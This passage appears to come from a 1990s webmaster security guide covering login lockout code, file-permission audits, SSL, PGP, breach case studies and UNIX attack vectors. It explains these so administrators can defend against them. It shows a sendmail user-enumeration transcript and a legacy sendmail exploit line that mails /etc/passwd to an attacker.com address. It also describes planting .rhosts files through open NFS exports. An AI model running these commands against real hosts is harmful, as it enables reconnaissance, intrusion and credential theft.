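    def __init__(self, max_failures=5, notify=print):
        self.max_failures = max_failures
        self.notify = notify      # called once when an account is disabled
        self.failures = {}        # user ID -> consecutive failed attempts
        self.disabled = set()     # user IDs that are locked out

    def is_disabled(self, user_id):
        return user_id in self.disabled

    def record_attempt(self, user_id, succeeded):
        """Record one login attempt; return True if the login may proceed."""
        if user_id in self.disabled:
            return False
        if succeeded:
            self.failures.pop(user_id, None)   # reset the counter on success
            return True
        count = self.failures.get(user_id, 0) + 1
        self.failures[user_id] = count
        if count >= self.max_failures:
            self.disabled.add(user_id)
            self.notify(f"Account {user_id!r} disabled after {count} failed logins")
        return False
```

Passing a function that sends e-mail as the notify argument would cover the "notify the system administrator" step. Note the trade-off: an attacker can deliberately lock out a legitimate user, so the administrator needs a procedure for re-enabling accounts.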

Realize that these mechanisms do nothing to keep local users out of the site. On any system with more than a few users, a computer-assisted cracker can probably guess at least one password. Make sure that key files like source code and password files are readable only by those who absolutely must have access.
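
One quick way to audit this on a UNIX host is to examine the permission bits of each sensitive file. The Python sketch below is a minimal check that assumes POSIX-style permissions; the function name is made up for the example.

```python
import os
import stat


def readable_by_others(path):
    """Return True if the file's mode grants read access to group or other."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))
```

A password file for which readable_by_others() returns True should have its permissions tightened (for example, to mode 600) unless there is a specific reason to share it.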

Vulnerability Due to CGI Scripts and Server-Side Includes

CGI scripts and server-side includes (SSIs) can make the server vulnerable. Many Webmasters believe that because the server runs as the unprivileged user nobody, no harm can be done. But nobody can copy the /etc/passwd file, mail a copy of the file system map, dump files from /etc, and even start a login server (on a high port) for an attacker to telnet to. User nobody can also run massive programs, bringing the server to its knees in a denial-of-service attack.

If you allow SSIs or CGI scripts on your site, be sure to read Chapters 33, "Server-Side Includes," and 35, "CGI Security."

Communications Security

Web site security works like a home burglar alarm. You don't expect to make your site impregnable, but making it difficult to crack encourages crackers to move on to less fortified sites. Once the private parts of the site are password-protected, and the common CGI holes are closed, the remaining vulnerability at the Web-site level resides in the communications links between the user and the site. An aggressive cracker can sniff passwords, credit card numbers, and other confidential information directly from the Internet.

Credit card companies have led the effort to encrypt communications links. Credit card theft on the Internet is expected to follow a different pattern than theft in conventional transactions. When a physical card is stolen, thieves know that they have just a few days, maybe just hours, before the card number is deactivated. They try to run up as large a balance as possible while the card is still good. In so doing, they often trigger security software. If, on the other hand, a thief could get access to thousands of credit card numbers, then he could use each number just once. Such illegal use is unlikely to trip any credit card company alarms, and therefore could lead to massive loss in the industry.

TIP
To learn about your options for accepting credit card or other secure information over the Web, be sure to read Chapter 34, "Transactions and Order Taking."

To put matters in perspective, many sites accept credit card numbers in the clear, but even in late 1996, it is difficult to document a single case of loss. Of course, if Internet credit card theft is following the low-density pattern described earlier, one does not expect loss to be detected or reported. In any case, as the size of the Web continues to grow and the number of commercial transactions increases, it seems wise to provide protection for confidential information like credit card numbers.

TIP
Some security experts advise their clients this way: "If you give your credit card number over the phone, or if you don't ask for the carbons when you sign the charge slip, then don't worry about giving your card number in the clear over the Internet."

Secure Sockets Layer

Most Webmasters are aware that Netscape Communications Corporation offers secure Web servers, the FastTrack server and the Enterprise server. The security in these products is based on Netscape's low-level encryption scheme, Secure Sockets Layer (SSL). Recall from the section in this chapter entitled "How Do Users Access Your Server?" that the Web is based on TCP/IP. TCP/IP consists of several software "layers"; you can replace the software implementing a layer with a new software component without changing the rest of the protocols. SSL is an encryption layer that sits between TCP and application protocols such as HTTP. When a client requests secure communications from a secure server, the server accepts the connection on a port reserved for encrypted traffic. The port is managed by software called the SSL Record Layer, which sits on top of TCP. Higher-level software, the SSL Handshake Protocol, uses the SSL Record Layer and its port to contact the client.

The SSL Handshake Protocol on the server arranges authentication and encryption details with the client using public-key encryption. Public-key encryption schemes are based on mathematical "one-way" functions. In a few seconds, anyone can determine that 7 × 19 equals 133. On the other hand, determining that 133 can be factored into 7 and 19 takes quite a bit more work. A user who already has these factors (the "secret key") can decrypt the message easily. Some commercial public-key encryption schemes are based on keys of 1,024 bits or more, which should require years of computation to crack. Using public-key encryption, the client and server exchange information about which cipher methods each understands. They agree on a one-time key to be used for the current transmission. The server might also send a certificate (called an X.509 v3 certificate) to prove its own identity.
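
To make the one-way idea concrete, here is a toy example in Python that uses the factors 7 and 19 from the text. It follows the textbook RSA construction, which is one well-known public-key scheme; the public exponent 5 is an arbitrary choice for the illustration, and numbers this small offer no security at all.

```python
from math import gcd

# Toy parameters taken from the text's example: the secret factors 7 and 19.
p, q = 7, 19
n = p * q                   # 133, the public modulus
phi = (p - 1) * (q - 1)     # 108, easy to compute only if the factors are known

e = 5                       # public exponent (an assumption; must be coprime to phi)
assert gcd(e, phi) == 1
d = pow(e, -1, phi)         # private exponent: modular inverse of e (Python 3.8+)


def encrypt(message):
    """Encrypt an integer 0 <= message < n with the public key (e, n)."""
    return pow(message, e, n)


def decrypt(ciphertext):
    """Decrypt with the private exponent d, which depends on the secret factors."""
    return pow(ciphertext, d, n)


def factor(modulus):
    """Recover the factors by trial division; feasible only because n is tiny."""
    for candidate in range(2, int(modulus ** 0.5) + 1):
        if modulus % candidate == 0:
            return candidate, modulus // candidate
    return None
```

Anyone may use e and n to encrypt, but computing d requires phi, and phi requires the factors. With a 1,024-bit modulus, the trial division in factor() would never finish in any practical amount of time.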

NOTE
Mathematically strong encryption schemes are classified by the U.S. Government as "munitions." In general, encryption software and algorithms developed in the U.S. cannot be exported. The U.S. Government takes this issue very seriously. Some other nations have policies prohibiting the transmission of encrypted data through their telephone lines. These policies have been the topic of much debate on the Internet and elsewhere.
In many cases, software that is compatible with the strong encryption schemes available in the U.S. has been developed outside the United States and is available as an "International" version. Be sure to read the license agreement that comes with your software. Users in the U.S. should use the U.S. version and are restricted from taking (or sending) the product overseas. Users outside the U.S. may be able to use the international version, subject to the laws in their country.
In other cases, vendors have weakened the algorithm by reducing the key size from 1,024 bits to 128 or even 40 bits, to avoid certain government restrictions.
In all cases, check the documentation that came with your browser or server, or get legal advice, to see what you can and cannot do with your software.

In the Netscape browser, a "key" icon in the lower-left corner of the window shows whether a session is encrypted or not. A broken key indicates a non-secure session. A key with one tooth shows that the session is running on a 40-bit key. A key with two teeth shows that a 128-bit key is in use.

End users should not assume that seeing an unbroken key guarantees that their transmission is secure. They also should check the certificate. In Netscape Navigator, you can access this information by choosing View, Document Info. If the certificate is not owned by the organization the users think they're doing business with, they should verify the certificate by calling the vendor.

SSL was developed by Netscape Communications and is supported by their browsers and servers. Open Market has announced that they will support SSL in their HTTP server. A free implementation of SSL, named SSLeay, serves as the basis for security in Apache and NCSA httpd, as well as in Secure Mosaic.

ON THE WEB
http://home.netscape.com/newsref/std/SSL.html  This site deals with SSL 3.0 standards and licensing.
http://home.netscape.com/eng/ssl3/   This site is the top of a hierarchy containing the technical specifications of SSL 3.0.
http://home.mcom.com/newsref/ref/internet-security.html  This site contains more general information on SSL.
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/  Visit this site to download the SSL library SSLeay.
http://www.psy.uq.oz.au/~ftp/Crypto/  This site contains the Frequently Asked Questions list for SSLeay.

SSL is a powerful encryption method. Because it has a publicly available reference implementation, you can easily add it to existing software such as Web and FTP servers. It's not perfect (for example, it doesn't flow through proxy servers correctly), but it's a first step in providing communications security.

Secure HTTP

A competing standard to SSL is Secure HTTP (S-HTTP) from Enterprise Integration Technologies. Like SSL, S-HTTP allows for both encryption and digital authentication. Unlike SSL, though, S-HTTP is an application-level protocol: it makes extensions to HTTP.

The S-HTTP proposal suggests a new document suffix, .shttp, and the following new protocol:

Secure * Secure-HTTP/1.1.

Using GET, a client requests a secure document, tells the server what kind of encryption it can handle, and tells the server where to find its public key. If the user who matches that key is authorized to GET the document, the server responds by encrypting the document and sending it back. The client then uses its secret key to decrypt the message and display it to the user.

One of the encryption methods available with S-HTTP is PGP, described in the next section.

Pretty Good Privacy

The Pretty Good Privacy application, written by Phil Zimmermann, has achieved fame and notoriety by spreading "encryption for everyone." For several years, PGP hung under a cloud since it did not have clear license to use the public-key encryption algorithms. There was also an investigation into whether Zimmermann had distributed PGP outside the United States. (U.S. law restricts the export of strong encryption systems.)

Those clouds have finally lifted. With the release of PGP 2.6, the licensing issues have been entirely resolved, and the U.S. Government has announced that it has no interest in seeking indictments against Zimmermann.

If you live in the U.S. and are a U.S. citizen or lawfully admitted alien, you can get PGP from the server at MIT. If you live outside the U.S., you should use PGP 2.6ui; this version was built in Europe and does not violate U.S. export control laws.

ON THE WEB
http://web.mit.edu/network/pgp-form.html  You can get PGP by visiting this URL and following the instructions given.
ftp://ftp.informatik.uni-hamburg.de/virus/crypt/pgp/tools  You can get the latest European-built version of PGP from this FTP site.
http://www.viacrypt.com/  Check out this site for more information on the commercial version of PGP.

Part of the agreement with the patent-holder, RSA Data Security, Inc., was that PGP could not be used for commercial purposes. A commercial version of the program, with proper licensing, is available from ViaCrypt.

Although PGP is available on all common platforms, its user interface is essentially derived from the UNIX command line; in other words, it's not particularly user-friendly. The ViaCrypt version has addressed this concern to some extent, but it's still fair to say that only a very small percentage of users use PGP on a regular basis. If S-HTTP moves into the mainstream, more users might use PGP "behind the scenes" as the basis for session encryption.

One good use of PGP, apart from S-HTTP, is in dealing with information after a user has sent it to the server. Suppose that a hotel accepts reservations (with a credit card number for collateral) over the Web. The hotel might use the Netscape Enterprise Server to ensure that credit card data is not sent in the clear between the user and the Web site. Then, once the CGI script gets the credit card information, what can it do with it? If it stores it unencrypted on a hard disk, the numbers are vulnerable to a cracker who penetrates overall site security. If the card numbers are sent in the clear via e-mail to a reservation desk, they risk being sniffed en route over the Internet.

One solution is to use PGP to transfer the reservation message (including credit card data) by secure e-mail. Start with a form mailer like Matt Wright's formmail.pl (available at Matt's Script Archive, http://www.worldwidemart.com/scripts/). Find the place in that script where it opens a file handle to sendmail, and change it to the following:

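# Pipe the message through PGP, then on to mail; the @ is escaped so Perl 5 does not treat it as an array.
open (MAIL, "| /usr/local/bin/pgp -eatf reservations | " .
      "mail reservations\@localInn.com") || &die("Could not open mail");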

Note that no user-supplied data is passed to the shell. Now, put the reservations desk on the PGP public keyring. When the script runs, PGP encrypts (the -e option) the text (-t) from STDIN for user reservations and wraps the result in ASCII armor (-a) so that it passes safely through mail systems. The result is written to STDOUT because the filter option (-f) is turned on.

The reservation clerk must have his own copy of PGP (it's available for PCs, Macs, and other common platforms). When the reservation clerk receives the encrypted message, he decrypts it using his secret key, making sure to store the credit card data and other private information offline. He can also save the encrypted message on his local disk, using PGP and a secret passphrase.

TIP
PGP allows the user to input a passphrase instead of a password. Passphrases can be arbitrarily long, and may have embedded white space and other special characters. Take advantage of this flexibility to make the passphrase difficult to guess.

Site Security

The first section of this chapter, "Web Security on the Internet and Intranet," tells you what individual Webmasters can do to enhance the security of their Web site. Closing the door to HTTP infiltrators is of little use if infiltrators can penetrate the site through FTP, sendmail, or telnet. This section covers the steps the system administrator can take to make the site more resistant to attack.

Much of the material in this section provides explicit tips about how to attack a UNIX system. Some of this material is obsolete (but may still apply to systems that have not had recent upgrades). All of this material is already widely disseminated among those people who are inclined to attack systems. The material is provided here so that system administrators can be aware of what kinds of attacks are likely to be made.

This section focuses on UNIX since most Web sites are hosted on UNIX servers. UNIX is one of the most powerful operating systems in common use, and with that power comes vulnerability.

Other operating systems, such as the various members of the Windows family, have somewhat less functionality and are consequently a bit less vulnerable. The Macintosh is unique in that it has no command-line interface; therefore, it is more resistant to certain kinds of attack.

Exposing the Threat

Many checks for vulnerability are left undone, even though they are simple and they hardly detract from performance and usability. In many cases, the system administrator is unaware of the threat or believes that "it will never happen at my site."

A site need not be operated by a bank or a Fortune 500 company to have assets worth protecting. A site need not be used by the military for war planning to be considered worthy of attack. As the case studies in this section show, sometimes merely being connected to the Internet is enough to cause a site to be infiltrated.

Case Studies

Security needs to be a budgeted item just like maintenance or development. Depending upon the security stance, the budget may be quite small or run to considerable sums. In some organizations, management may need to be convinced that the threat is real. The following case studies illustrate how other sites have been attacked and compromised, as well as government analyses of threats and vulnerabilities.

The Morris Worm  On the evening of November 2, 1988, a program was introduced to the Internet. This program collected key information from the site and then broke into other machines using security holes in existing software. Once on a new system, the program would start the process again.

Within hours, a large percentage of the hosts on the Internet were infected. Many system administrators responded by taking their sites offline, ironically making it impossible for them to get the information that told them how to eliminate the program.

The Morris Worm exploited two vulnerabilities. First, the fingerd daemon had a security hole in its input routine. When the input buffer was overflowed with carefully chosen data, the attacker got access to a privileged login shell.

CAUTION
Any program running as a privileged user should be double-checked to make sure all input is limited to the size of the input buffer.
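
The same discipline applies in any language. The Python sketch below shows the general idea of refusing input that exceeds a fixed limit before processing it; the limit and the function name are assumptions for illustration. (Python manages its own memory, so this models the check rather than the overflow itself. In C, the equivalent precaution is to read with a length-limited call such as fgets rather than an unbounded one such as gets.)

```python
import io

BUFFER_SIZE = 512   # hypothetical fixed buffer size for one request line


def read_request_line(stream, limit=BUFFER_SIZE):
    """Read one line, refusing any input longer than the buffer allows."""
    # Ask for at most limit + 1 bytes so an overlong line is detected
    # without ever holding more than that in memory.
    line = stream.readline(limit + 1)
    if len(line) > limit:
        raise ValueError("input exceeds buffer size; request rejected")
    return line.rstrip(b"\r\n")


# Usage: a short query is accepted; an oversized one would raise ValueError.
print(read_request_line(io.BytesIO(b"jones\r\n")))   # prints b'jones'
```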

The second security hole was in sendmail, the UNIX program that routes mail. Sendmail is notoriously difficult to configure, so the developers left a DEBUG feature in place to help system administrators. Many administrators chose to leave DEBUG turned on all the time, which allowed a user to issue a set of commands instead of a user's address. The result: an open door into a privileged shell.

The Morris Worm used several proven techniques to guess passwords. Too many users (indeed, too many system administrators) leave some passwords at vendor defaults. Or they make passwords short, all lowercase, or easy to guess from system or personal information. The off-the-Net program crack can be used by administrators against their own password file to reveal weak passwords.

WANK and OILZ Worms  During October and November 1989, two networks that form part of the Internet came under attack. The SPAN and HEPnet networks included many DEC VAXen running the VMS operating system. The initial attack, called the WANK Worm, targeted these VAXen. It played practical jokes on users, sent annoying messages, and penetrated system accounts.

The WANK Worm attacked only a few accounts on each machine to avoid detection. If it found a privileged account, it would invade the system and start again with systems reachable from the new host.

Within a few weeks, countermeasures were developed and installed that stopped the WANK Worm. The attackers responded with an improved version, called the OILZ Worm. The OILZ Worm fixed some problems with the WANK Worm and added exploitation of the default DECnet account. System administrators who had installed their DECnet software but left the vendor password in place soon found their systems infected.

Ship Sunk from Cyberspace  In March 1991, a ship in the Bay of Biscay was lost in a storm. Intruders had broken into the computers of the European Weather Forecasting Centre in Bracknell, Berkshire and disabled the weather forecasting satellite that would have warned the crew of the impending storm.

Cancer Test Results Corrupted  In 1993, a group of intruders invaded a medical computer and changed patients' cancer screening results from negative to positive, leading those patients to believe they had cancer.

$10,000,000 Stolen from CitiBank  Banks usually do not divulge major thefts, but security experts estimate that about 36 instances of computer theft of over $1,000,000 occur each year in Europe and the United States. One such case came to light when CitiBank requested the extradition of a cracker in St. Petersburg, Russia, for allegedly stealing more than $10,000,000 electronically.

This case is among those documented by Richard O. Hundley and Robert H. Anderson in their 1994 RAND report "Security in Cyberspace: An Emerging Challenge to Society."

Information Infrastructure Targets Listed  In recent years, the Pentagon has begun to talk seriously about Information Warfare (IW). The U.S. used IW techniques in the Gulf War against Iraq, with devastating success.

The July/August 1993 issue of Wired listed 10 Infrastructure Warfare Targets. At least 3 of these are clearly part of the information infrastructure. In his report "CIS Special Report on Information Warfare" for the Computer Security Institute in San Francisco, Richard Power interviewed Dr. Fred Cohen of Management Analytics (Hudson, Ohio), author of Protection and Security on the Information Superhighway.

Dr. Cohen gave detailed scenarios by which the Culpeper Telephone Switch, which carries all U.S. Federal funds transfers, and the Internet could be disrupted, at least temporarily. Dr. Cohen declined to describe attack strategies against the Worldwide Military Command and Control System (WWMCCS), stating, "It's too vital."

Pentagon and RAND Role-Play an Information War  In 1995, Roger C. Molander and a team of researchers at the RAND Institute conducted a series of exercises based on "The Day After…" methodology. RAND led six exercises designed to crystallize the government's understanding of information warfare.

In the scenario, a Middle East state makes a power grab for an oil-rich neighbor. To keep the U.S. from intervening, they launch an IW attack against the U.S. Computer-controlled telephone systems crash, a freight train and a passenger train are misrouted and collide, and computer-controlled pipelines malfunction, triggering oil refinery explosions and fires.

International funds-transfer networks are disrupted, causing stock markets to plummet. Phone systems and computers at U.S. military bases are jammed, making it difficult to deploy troops. The screens on some of the U.S.'s sophisticated electronic weapons begin to flicker as their software crumbles.

In the scenario, there is no smoking gun that points to the aggressor. The participants in the RAND study were asked to prepare their recommendations for the President in less than an hour. The good news is, as system administrators, we need concern ourselves only with keeping our few boxes safe.

Security Awareness

Many security holes can be closed by training staff and users on basic security procedures. Many crackers have acknowledged that it is far simpler to get key information from human operators than to obtain it through technical tricks and vulnerabilities. Here are a few ways crackers can exploit human security holes.

Forgetting Your Password  It has happened to everyone at some point. Returning after some weeks away, logging on to a system that you don't use on a regular basis, you draw a blank. You sit frozen, looking at the blinking cursor and the prompt, Enter Password:.

You were taught, "Never write your password down" and like a good soldier, you obeyed. Now you're locked out, it's 7:00 pm, and the report due in the morning is on the other side of this digital watchdog.

Faced with this situation, many people call their service provider. Most systems administration staff are well-enough trained not to give out the password. Indeed, on UNIX systems, they cannot get access to it.

But they will demand some piece of personal information as identification. The mother's maiden name is common. Once they have "identified" the caller to their satisfaction, they reset the password on the account to some known entry such as the username and give out that password.

NOTE
One common choice for a password is to set the password to be the same as the username. Thus, the password for account jones might be jones. This practice is so common that it has a name: Such accounts are called "joes."
When a user forgets a password, the system operator may set the password so the account is a joe. The user should immediately change the password to something that only he or she knows. Unfortunately, many users don't know how to change their password or ignore this guideline and leave their account as a joe. As a result, most systems have at least one joe through which an attacker can gain access.
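
An administrator can look for joes before a cracker does by hashing each username with that account's salt and comparing the result with the stored hash. The Python sketch below shows the idea only; the hash function is a stand-in (an assumption for the example, not the UNIX crypt routine), and the layout of the accounts table is hypothetical.

```python
import hashlib


def hash_password(password, salt):
    """Stand-in for the system's password hash (an assumption, not crypt(3))."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def find_joes(accounts):
    """Return the usernames whose password equals the username.

    accounts maps username -> (salt, stored_hash).
    """
    joes = []
    for username, (salt, stored_hash) in accounts.items():
        if hash_password(username, salt) == stored_hash:
            joes.append(username)
    return sorted(joes)
```

Any account the function reports should have its password changed or be disabled until the owner chooses a new one.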

There are no perfect solutions to this problem. One partial solution may be to encourage users to write their password down in a very private place. There are many stories of accounts being penetrated using the "I lost my password" story. There are almost no known cases of a password being stolen out of a wallet or purse.

If management decides that they will set the password to a known value on request, develop a procedure to handle the situation. Require something other than the mother's maiden name. (That choice is so common that it's easily obtained.) Don't give the information to the caller.

Tell the caller to hang up, and then call back at the number on file in the records. Do not accept changes to those records by e-mail. Require that people confirm information about a change of address or phone number by fax or regular mail.

CAUTION
Never use the same password for two different systems. Instead, use a mnemonic hook that can be tailored for each system. To log into a system called "Everest," use a password like "Mts2Climb." For a system called "Vision," use "Glasses4Me." Even if the system looks at only the first eight characters, the passwords are unique and not easy to crack with a dictionary or a brute-force attack.

Physical Security  As the leaders in a paperless society, service providers and in-house system administrators generate a lot of paper. Sooner or later, most of that paper ends up in the trash. Crackers have been known to comb the garbage finding printouts of configurations, listings of source code, even handwritten notes and interoffice memos revealing key information that can be used to penetrate the system.

Other crackers, not motivated to dig through garbage cans, arrange a visit to the site. They may come as prospective clients or to interview for a position. They may hire on as a member of the custodial staff or even join the administrative staff.

Take a page from the military's book. Decide what kinds of documents hold sensitive information and give them a distinctive marking. Put them away in a safe place when not in use. Do not allow them to sit open on desktops. When the time comes for them to be destroyed, shred them.

Maintain a visitor's log. Get positive ID on everyone entering sensitive areas for any reason. Do a background check on prospective employees. Post a physical security checklist on the back of the door. Have the last person out check the building to make sure that doors and windows are locked, alarms set, and sensitive information has been put away. Then have them initial the sign-out sheet.

CAUTION
If your shop reuses old printouts as scratch paper, make sure that both sides are checked for sensitive information.

Whom Do You Trust?: Part I  Most modern computer systems establish a small (and sometimes not so small) ring of hosts that they "trust." This web of trust is convenient and increases usability. Instead of having to log in and provide a password for each of several machines, users can log in to their home machine and then move effortlessly throughout the local network. Clearly there are security implications here.

For example, on UNIX systems there is a file called /etc/hosts.equiv. Any host on that list is implicitly trusted. Some vendors ship systems with /etc/hosts.equiv set to trust everyone. Most versions of UNIX also allow a file called .rhosts in each user's home directory, which works like /etc/hosts.equiv.

The .rhosts file is read by the "r" commands, such as rlogin, rcp, and rsh. When user jones on host A attempts an r-command on host B as user smith, host B looks for a .rhosts file in the home directory of smith. Finding one, it looks to see if user jones of host A is trusted. If so, the access is permitted.
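
The lookup just described can be modeled in a few lines. This Python sketch is a simplification made for illustration: it handles only the common "host" and "host user" line forms and the "+" wildcard, and it ignores features such as netgroups that real implementations may support.

```python
def rhosts_allows(rhosts_text, remote_host, remote_user, local_user):
    """Return True if a .rhosts file with this content would trust the caller.

    Simplified model: handles 'host', 'host user', and the '+' wildcard only.
    """
    for raw_line in rhosts_text.splitlines():
        fields = raw_line.split()
        if not fields:
            continue                      # skip blank lines
        host = fields[0]
        # With no user field, only the same-named remote user is trusted.
        user = fields[1] if len(fields) > 1 else local_user
        host_ok = host == "+" or host.lower() == remote_host.lower()
        user_ok = user == "+" or user == remote_user
        if host_ok and user_ok:
            return True
    return False
```

For the example in the text, rhosts_allows("hostA jones", "hostA", "jones", "smith") returns True. A file containing the single line "+ +" admits any user from any host, which is why such entries deserve special attention in an audit.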

All too often, a user will admit anyone from a particular host or will list dozens of hosts. One report, available at

ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z

documents an informal survey of over 200 hosts with 40,000 accounts. About 10% of these accounts had a .rhosts file. These files averaged six trusted hosts each.

Many .rhosts had over 100 entries. More than one had over 500 entries! Using .rhosts, any user can open a hole in security. One can conclude that virtually every host on the Internet trusts some other machine and so is vulnerable. If your host is on a corporate intranet, it may be vulnerable to attack from the Internet if it trusts machines outside its firewall.

The author of the report points out that these sites were not typical. They were chosen because their administrators are knowledgeable about security. Many write security programs. In many cases, the sites were operated by organizations that do security research or provide security products. In other words, these sites may be among the best on the Internet.

Whom Do You Trust?: Part II  Even if a site has /etc/hosts.equiv and .rhosts under control, there are still vulnerabilities in the "trusting" mechanisms. Take the case of the Network File System, or NFS. One popular book on UNIX says of NFS, "You can use the remote file system as easily as if it were on your local computer." That is exactly correct, and that ease of use applies to the cracker as well as the legitimate user.

On many UNIX systems, the utility showmount is available to outside users. showmount -e reveals the export list for a host. If the export list is everyone, all crackers have to do is mount the volume remotely. If the volume has users' home directories, crackers can add a .rhosts file, allowing them to log on at any time without a password.

If the volume doesn't have users' home directories, it may have user commands. Crackers can substitute a Trojan horse, a program that looks like a legitimate user command but contains code to open a security hole for the cracker. As soon as a privileged user runs one of these programs, the cracker is in.

TIP
Export file systems only to known, trusted hosts. When possible, export file systems read-only. Enforce this rule with users who use .rhosts.
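
Administrators can run showmount -e against their own hosts and scan the result for exports open to all. The Python sketch below parses a captured listing; the output layout varies between UNIX versions, so the format assumed here (a header line, then one "path clients" line per export, with "(everyone)" or "*" marking an unrestricted export) is an assumption, as is the sample text.

```python
def world_exports(showmount_output):
    """Return exported paths that appear to be open to every host."""
    open_paths = []
    for line in showmount_output.splitlines():
        fields = line.split()
        if not fields or not fields[0].startswith("/"):
            continue                      # skip the header and blank lines
        path, clients = fields[0], " ".join(fields[1:])
        if clients in ("(everyone)", "*"):
            open_paths.append(path)
    return open_paths


# Hypothetical captured output, for illustration only.
SAMPLE_OUTPUT = """Export list for victim:
/home      (everyone)
/usr/local client1,client2
"""
print(world_exports(SAMPLE_OUTPUT))   # prints ['/home']
```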

Openings Through Trusted Programs  Recall that the Morris Worm used security holes in "safe" programs-programs that have been part of UNIX for years. Although sendmail has been patched, there are ways other standard products can contribute to a breach.

The finger daemon, fingerd, is often left running on systems that have no need for it. Using finger (the client program that talks to fingerd), a cracker can find out who is logged on. (Crackers are less likely to be noticed when there are few users around.)

finger can tell a remote user about certain services. For example, if a system has a user named www or http, it is likely to be running a Web server. If a site has user ftp, it probably serves anonymous FTP.

If a site has anonymous FTP, it may have been configured incorrectly. Anonymous FTP should be run inside a "silver bubble": The system administrator executes the chroot() command to seal off the rest of the system from FTP. Inside the silver bubble, the administrator must supply a stripped-down version of files a UNIX program expects to see, including /etc/passwd.

A careless administrator might just copy the live /etc/passwd into the FTP directory. With a list of usernames, crackers can begin guessing passwords. If the /etc/passwd file has encrypted passwords, all the better. Crackers can copy the file back to their machines and attack passwords without arousing the suspicion of the administrator.

TIP
Make sure that ~ftp and all system directories and files below ~ftp are owned by root and are not writable by any user.
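
A check like this one is easy to automate. The following Python sketch walks a directory tree and reports anything with the wrong owner or with group or world write permission; the function name and the report format are made up for the example, and directories that are deliberately writable (an upload area, for instance) would need to be excluded by hand.

```python
import os
import stat


def ftp_tree_problems(root_dir, owner_uid=0):
    """Report entries under root_dir that are not owned by owner_uid or
    that are writable by group or other."""
    paths = [root_dir]
    for dirpath, dirnames, filenames in os.walk(root_dir):
        paths.extend(os.path.join(dirpath, n) for n in dirnames + filenames)

    problems = []
    for path in paths:
        info = os.lstat(path)             # lstat: do not follow symbolic links
        if info.st_uid != owner_uid:
            problems.append((path, "wrong owner"))
        writable = info.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if writable and not stat.S_ISLNK(info.st_mode):
            problems.append((path, "writable by group or other"))
    return problems
```

Run as root against the anonymous FTP home directory, an empty result means the tree meets the rule in the tip; each tuple in a non-empty result names a path to fix.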

If the system administrator has turned off fingerd, the cracker can exploit rusers instead. The UNIX utility rusers gives a list of users who are logged on to the remote machine. Crackers can use this information to pick a time when detection is unlikely. They can also build up a list of names to use in a password-cracking assault.

Systems that serve diskless workstations often run a simple program called tftp (Trivial File Transfer Protocol). tftp does not support passwords. If tftp is running, crackers can often fetch any file they want, including the password file.

The e-mail server is a source of information to the cracker. Mail is transferred over TCP networks using mail transfer agents (MTAs) such as sendmail. MTAs communicate using the Simple Mail Transfer Protocol (SMTP). By impersonating an MTA, a cracker can learn a lot about who uses a system.

SMTP supports two commands (VRFY and EXPN), which are intended to supply information rather than transfer mail. VRFY verifies that an address is good. EXPN expands a mailing list without actually sending any mail. For example, a cracker knows that sendmail is listening on port 25 and can type

telnet victim.com 25

The target machine responds

220 dse Sendmail AIX 3.2/UCB 5.64/4.03 ready at 20 Mar 1996 13:40:31 -0600

Now the cracker is talking to sendmail. The cracker asks sendmail to verify some accounts. (-> denotes characters typed by the cracker, and <- denotes the system's response):

->vrfy ftp
<-550 ftp... User unknown: No such file or directory
<-sendmail daemon: ftp... User unknown::No such file or directory

->vrfy trung
<-250 Trung Do x1677 <trung>

->vrfy mikem
<-250 Mike Morgan x7733 <mikem>

Within a few seconds, the cracker has established that there is no ftp user but that trung and mikem both exist. Based on knowledge of the organization, the cracker guesses that one or both of these individuals may be privileged users.

Now the cracker tries to find out where these individuals receive their mail. Many versions of sendmail treat expn just like vrfy, but some give more information:

->expn trung
<-250 Trung Do x1677 <trung>

->expn mikem
<-250 Mike Morgan x7733 <mikem@elsewhere.net>

The cracker has established that mikem's mail is being forwarded, and now knows the forwarding address. mikem may be away for an extended period. Attacks on his account may go unnoticed.
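
To see how much a single reply line gives away, the exchange above can be picked apart mechanically. The following Python sketch is only an illustration: the function name parse_smtp_reply is hypothetical, and the code assumes that replies look exactly like the sample transcript (a three-digit code followed by text, with the mailbox in angle brackets).

```python
import re

# Hypothetical helper: splits one SMTP reply line of the form shown in the
# transcript above, e.g. "250 Mike Morgan x7733 <mikem@elsewhere.net>".
REPLY = re.compile(r"^(?P<code>\d{3})[ -](?P<text>.*)$")
MAILBOX = re.compile(r"<(?P<mailbox>[^<>]+)>")


def parse_smtp_reply(line):
    """Return (code, mailbox, forwarded) for a VRFY or EXPN reply line."""
    match = REPLY.match(line.strip())
    if match is None:
        raise ValueError("not an SMTP reply: %r" % line)
    code = int(match.group("code"))
    found = MAILBOX.search(match.group("text"))
    # Only 2xx replies confirm that the account exists.
    mailbox = found.group("mailbox") if found and 200 <= code < 300 else None
    # An "@" in the mailbox suggests that mail is delivered on another host.
    forwarded = mailbox is not None and "@" in mailbox
    return code, mailbox, forwarded


if __name__ == "__main__":
    for reply in ("550 ftp... User unknown: No such file or directory",
                  "250 Trung Do x1677 <trung>",
                  "250 Mike Morgan x7733 <mikem@elsewhere.net>"):
        print(parse_smtp_reply(reply))
```

Every field this function returns is something the server volunteered to an anonymous caller. If your MTA lets you turn off VRFY and EXPN, replies like these never leave the machine.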

Here's another sendmail attack. It has been patched in recent versions of sendmail, but older copies are still vulnerable. The cracker types

telnet victim.com 25
mail from: "|/bin/mail warlord@attacker.com < /etc/passwd"

Older versions of sendmail would complain that the user was unknown but would cheerfully send the password file back to the attacker.

Another program built into most versions of UNIX is rpcinfo. When run with the -p switch, rpcinfo reveals what services are provided. If the target is a Network Information System (NIS) server, the cracker is all but in; NIS offers numerous opportunities to breach security. If the target offers the rexd utility, the cracker can just ask it to run commands. This utility does not look in /etc/hosts.equiv or .rhosts to see if the user is authorized to use the system!

If the server is connected to diskless workstations, rpcinfo shows it running bootparam. By asking bootparam for BOOTPARAMPROC_WHOAMI, crackers get the NIS domain name. Once crackers have the domain name, they can fetch arbitrary NIS maps such as /etc/passwd.

Security Holes in the Network Information System  The Network Information System (NIS), formerly known as the Yellow Pages, is a powerful tool and can be used by crackers to get full access to the system. If the cracker can get access to the NIS server, it is only a short step to controlling all client machines.

TIP
Don't run NIS. If you must run NIS, choose a domain name that is difficult to guess. Note that the NIS domain name has nothing to do with the Internet domain name, such as www.yahoo.com.

